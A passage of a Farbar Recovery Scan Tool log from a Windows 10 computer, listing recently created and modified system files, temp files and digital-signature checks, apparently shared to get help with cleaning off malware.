2016-02-19 13:15 - 2016-01-27 00:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-19 13:15 - 2016-01-27 00:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-19 13:15 - 2016-01-27 00:43 - 00359776 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-19 13:15 - 2016-01-27 00:37 - 01998176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-02-19 13:15 - 2016-01-27 00:37 - 00576352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-02-19 13:15 - 2016-01-27 00:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-19 13:15 - 2016-01-27 00:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-19 13:15 - 2016-01-27 00:13 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-02-19 13:15 - 2016-01-27 00:12 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-02-19 13:15 - 2016-01-27 00:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-19 13:15 - 2016-01-27 00:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-19 13:15 - 2016-01-27 00:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-19 13:15 - 2016-01-27 00:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-19 13:15 - 2016-01-27 00:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-19 13:15 - 2016-01-27 00:05 - 18678272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-19 13:15 - 2016-01-27 00:05 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-02-19 13:15 - 2016-01-27 00:05 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-02-19 13:15 - 2016-01-27 00:04 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-19 13:15 - 2016-01-27 00:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-19 13:15 - 2016-01-27 00:03 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-19 13:15 - 2016-01-27 00:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-19 13:15 - 2016-01-27 00:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-19 13:15 - 2016-01-26 23:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-19 13:15 - 2016-01-26 23:57 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-19 13:15 - 2016-01-26 23:55 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-19 13:15 - 2016-01-26 23:55 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-19 13:15 - 2016-01-26 23:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-19 13:15 - 2016-01-26 23:50 - 02230784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-19 13:15 - 2016-01-26 23:50 - 01504768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-19 13:15 - 2016-01-26 23:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-19 13:15 - 2016-01-26 23:49 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-19 13:15 - 2016-01-26 23:48 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-19 13:15 - 2016-01-26 23:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-19 13:15 - 2016-01-26 23:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-19 13:15 - 2016-01-26 23:41 - 03592704 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-19 13:15 - 2016-01-26 23:39 - 02275328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-19 13:15 - 2016-01-26 23:38 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-19 13:15 - 2016-01-26 23:38 - 01734656 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-19 13:15 - 2016-01-26 23:37 - 04894720 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-19 13:15 - 2016-01-26 23:36 - 02757120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-19 13:15 - 2016-01-26 23:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-19 13:15 - 2016-01-26 23:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll
2016-02-19 12:45 - 2016-02-19 12:53 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-02-19 12:44 - 2016-02-19 12:44 - 00000000 ____D C:\WINDOWS\pss
2016-02-19 09:11 - 2016-02-19 09:11 - 00000000 ____D C:\$SysReset
2016-02-19 08:25 - 2016-02-19 21:57 - 00000000 ____D C:\ProgramData\54070cb8-2431-0
2016-02-19 08:20 - 2016-02-19 21:57 - 00000000 ____D C:\ProgramData\54070cb8-6861-0
2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\{2b04c619-412c-1}
2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\{08be3c40-312c-0}
2016-02-17 15:10 - 2016-02-17 15:10 - 00388478 _____ C:\Users\Jonathan\Downloads\Baroque.ppsx
2016-02-04 10:44 - 2016-02-04 10:44 - 00961103 _____ C:\Users\Jonathan\Downloads\SCC Middle Ages and Renaissance (1).ppsx
2016-02-03 19:11 - 2016-02-03 19:12 - 00961103 _____ C:\Users\Jonathan\Downloads\SCC Middle Ages and Renaissance.ppsx
2016-02-02 17:40 - 2016-02-02 17:40 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
2016-01-31 09:26 - 2016-01-16 01:23 - 08728920 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-01-31 09:26 - 2016-01-16 01:20 - 06971752 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-01-31 09:26 - 2016-01-16 00:45 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-01-31 09:26 - 2016-01-16 00:35 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-01-31 09:25 - 2016-01-16 01:37 - 00202472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2016-01-31 09:25 - 2016-01-16 01:36 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-01-31 09:25 - 2016-01-16 01:36 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-01-31 09:25 - 2016-01-16 01:34 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-01-31 09:25 - 2016-01-16 01:24 - 00538632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-01-31 09:25 - 2016-01-16 01:21 - 01750440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2016-01-31 09:25 - 2016-01-16 01:20 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-01-31 09:25 - 2016-01-16 01:20 - 00431240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-01-31 09:25 - 2016-01-16 01:20 - 00366224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2016-01-31 09:25 - 2016-01-16 01:19 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-01-31 09:25 - 2016-01-16 01:19 - 00405568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-01-31 09:25 - 2016-01-16 01:12 - 01415200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-01-31 09:25 - 2016-01-16 01:09 - 01089880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-01-31 09:25 - 2016-01-16 01:08 - 01174008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-01-31 09:25 - 2016-01-16 01:08 - 00440152 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2016-01-31 09:25 - 2016-01-16 00:46 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-01-31 09:25 - 2016-01-16 00:44 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-01-31 09:25 - 2016-01-16 00:44 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll
2016-01-31 09:25 - 2016-01-16 00:44 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2016-01-31 09:25 - 2016-01-16 00:43 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttpcom.dll
2016-01-31 09:25 - 2016-01-16 00:42 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-01-31 09:25 - 2016-01-16 00:42 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll
2016-01-31 09:25 - 2016-01-16 00:41 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2016-01-31 09:25 - 2016-01-16 00:40 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasauto.dll
2016-01-31 09:25 - 2016-01-16 00:40 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaui.exe
2016-01-31 09:25 - 2016-01-16 00:40 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe
2016-01-31 09:25 - 2016-01-16 00:39 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2016-01-31 09:25 - 2016-01-16 00:38 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-01-31 09:25 - 2016-01-16 00:38 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-01-31 09:25 - 2016-01-16 00:38 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimCfg.dll
2016-01-31 09:25 - 2016-01-16 00:38 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbio.dll
2016-01-31 09:25 - 2016-01-16 00:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-01-31 09:25 - 2016-01-16 00:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-01-31 09:25 - 2016-01-16 00:37 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-01-31 09:25 - 2016-01-16 00:37 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-01-31 09:25 - 2016-01-16 00:36 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-01-31 09:25 - 2016-01-16 00:36 - 00475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDDS.dll
2016-01-31 09:25 - 2016-01-16 00:36 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-01-31 09:25 - 2016-01-16 00:36 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimAuth.dll
2016-01-31 09:25 - 2016-01-16 00:36 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll
2016-01-31 09:25 - 2016-01-16 00:35 - 00383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-01-31 09:25 - 2016-01-16 00:35 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasadhlp.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00610816 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00477696 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttpcom.dll
2016-01-31 09:25 - 2016-01-16 00:33 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2016-01-31 09:25 - 2016-01-16 00:33 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2016-01-31 09:25 - 2016-01-16 00:33 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-01-31 09:25 - 2016-01-16 00:32 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-01-31 09:25 - 2016-01-16 00:32 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pcaui.exe
2016-01-31 09:25 - 2016-01-16 00:31 - 00851456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-01-31 09:25 - 2016-01-16 00:31 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2016-01-31 09:25 - 2016-01-16 00:31 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-01-31 09:25 - 2016-01-16 00:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-01-31 09:25 - 2016-01-16 00:31 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasautou.exe
2016-01-31 09:25 - 2016-01-16 00:30 - 02127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-01-31 09:25 - 2016-01-16 00:30 - 01053696 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-01-31 09:25 - 2016-01-16 00:30 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-01-31 09:25 - 2016-01-16 00:30 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimCfg.dll
2016-01-31 09:25 - 2016-01-16 00:30 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winbio.dll
2016-01-31 09:25 - 2016-01-16 00:29 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2016-01-31 09:25 - 2016-01-16 00:29 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 00884736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimAuth.dll
2016-01-31 09:25 - 2016-01-16 00:27 - 00335872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-01-31 09:25 - 2016-01-16 00:26 - 00535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2016-01-31 09:25 - 2016-01-16 00:26 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-01-31 09:25 - 2016-01-16 00:26 - 00260608 _____ C:\WINDOWS\system32\MTFServer.dll
2016-01-31 09:25 - 2016-01-16 00:26 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-01-31 09:25 - 2016-01-16 00:25 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2016-01-31 09:25 - 2016-01-16 00:25 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-01-31 09:25 - 2016-01-16 00:25 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-01-31 09:25 - 2016-01-16 00:24 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2016-01-31 09:25 - 2016-01-16 00:24 - 00613888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2016-01-31 09:25 - 2016-01-16 00:24 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-01-31 09:25 - 2016-01-16 00:24 - 00273408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2016-01-31 09:25 - 2016-01-16 00:23 - 02050048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-01-31 09:25 - 2016-01-16 00:23 - 00687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-01-31 09:25 - 2016-01-16 00:21 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-01-31 09:25 - 2016-01-16 00:20 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-01-31 09:25 - 2016-01-16 00:20 - 02597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-01-31 09:25 - 2016-01-16 00:20 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-01-31 09:25 - 2016-01-16 00:20 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 00733184 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-01-31 09:25 - 2016-01-16 00:18 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2016-01-31 09:25 - 2016-01-16 00:17 - 05503488 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-01-31 09:25 - 2016-01-16 00:16 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-01-31 09:25 - 2016-01-16 00:16 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2016-01-31 09:25 - 2016-01-16 00:15 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-01-31 09:25 - 2016-01-16 00:14 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-01-31 09:25 - 2016-01-16 00:14 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-01-31 09:25 - 2016-01-16 00:11 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-23 20:21 - 2015-10-30 02:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-23 20:21 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-23 20:18 - 2015-10-31 13:04 - 00000000 ____D C:\Program Files (x86)\Opera
2016-02-23 19:02 - 2015-10-31 13:39 - 00000938 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-22 20:18 - 2015-10-31 18:39 - 00000000 ____D C:\Users\Jonathan\Documents\YouCam
2016-02-22 20:16 - 2015-12-06 19:53 - 00000000 __SHD C:\Users\Jonathan\IntelGraphicsProfiles
2016-02-22 20:16 - 2015-12-06 19:30 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-02-22 20:16 - 2015-10-31 13:39 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-22 20:15 - 2016-01-04 16:43 - 00000376 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJonathan.job
2016-02-22 20:15 - 2015-12-06 19:47 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-22 16:46 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\rescache
2016-02-21 16:55 - 2016-01-04 16:43 - 00003280 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJonathan
2016-02-21 11:55 - 2015-12-06 19:34 - 00973984 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-21 11:55 - 2015-10-30 02:21 - 00000000 ____D C:\WINDOWS\INF
2016-02-20 19:52 - 2015-11-01 19:46 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-02-19 22:03 - 2016-01-17 17:24 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-02-19 22:02 - 2015-07-16 01:05 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-02-19 21:59 - 2015-10-30 01:28 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-02-19 21:58 - 2015-10-30 04:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-19 19:02 - 2015-10-31 13:39 - 00002279 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-19 19:02 - 2015-10-31 13:39 - 00002267 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-19 13:40 - 2015-10-31 13:05 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-19 13:37 - 2015-10-31 13:05 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-19 13:37 - 2015-10-30 02:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-19 13:18 - 2015-10-31 13:39 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-19 12:30 - 2015-12-06 19:34 - 00000000 ____D C:\Users\Jonathan
2016-02-19 12:27 - 2015-10-31 18:39 - 00000000 ____D C:\Users\Jonathan\AppData\Local\DropboxOEM
2016-02-19 12:27 - 2015-10-31 18:38 - 00000000 ____D C:\Users\Jonathan\AppData\Local\Hewlett-Packard
2016-02-19 12:27 - 2015-10-30 04:07 - 00000000 ____D C:\WINDOWS\ShellNew
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ___SD C:\WINDOWS\system32\Nui
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\setup
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\icsxml
2016-02-19 12:27 - 2015-10-30 01:28 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-02-19 12:16 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\registration
2016-02-19 12:11 - 2015-10-31 18:38 - 00000000 ____D C:\Users\Jonathan\AppData\Local\Packages
2016-02-19 08:20 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\b3eda95e-7691-0
2016-02-19 08:20 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\b3eda95e-5667-1
2016-02-10 19:02 - 2015-10-31 18:41 - 00000000 ___RD C:\Users\Jonathan\OneDrive
2016-02-07 22:56 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-02-04 17:40 - 2015-11-01 19:46 - 00004030 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-02-04 17:40 - 2015-10-31 13:35 - 00000000 ____D C:\Users\Jonathan\AppData\Local\Adobe
2016-02-04 10:42 - 2015-10-31 13:05 - 00003970 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1446314695
2016-02-04 10:42 - 2015-10-31 13:05 - 00001127 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2016-02-03 14:01 - 2015-10-30 02:26 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-03 14:01 - 2015-10-30 02:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-02-02 17:40 - 2015-10-30 02:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-02-02 17:40 - 2015-10-30 02:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-02-02 17:38 - 2016-01-12 22:16 - 00000000 ____D C:\Program Files\Microsoft Office
2016-02-02 17:30 - 2015-10-30 02:24 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-02-02 17:30 - 2015-10-30 02:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-02-02 17:30 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-02-02 17:30 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-02-01 16:56 - 2015-10-31 13:39 - 00003996 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-01 16:56 - 2015-10-31 13:39 - 00003764 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
 
Some files in TEMP:
====================
C:\Users\Jonathan\AppData\Local\Temp\drm_dialogs.dll
C:\Users\Jonathan\AppData\Local\Temp\InstallHelper.exe
C:\Users\Jonathan\AppData\Local\Temp\sqlite3.dll
C:\Users\Jonathan\AppData\Local\Temp\_is1E5B.exe
C:\Users\Jonathan\AppData\Local\Temp\_is47C1.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-22 16:34
 
==================== End of FRST.txt ============================
 
Addition.txt
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:17-02-2016
Ran by Jonathan (2016-02-23 20:44:41)
Running from C:\Users\Jonathan\Downloads
